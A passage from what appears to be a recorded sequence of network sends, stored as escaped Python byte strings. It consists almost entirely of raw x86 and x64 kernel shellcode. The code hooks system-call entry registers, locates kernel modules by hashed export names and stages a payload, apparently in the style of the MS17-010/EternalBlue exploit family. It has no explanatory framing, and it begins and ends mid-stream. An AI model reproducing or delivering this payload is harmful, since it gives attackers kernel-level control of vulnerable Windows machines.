x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\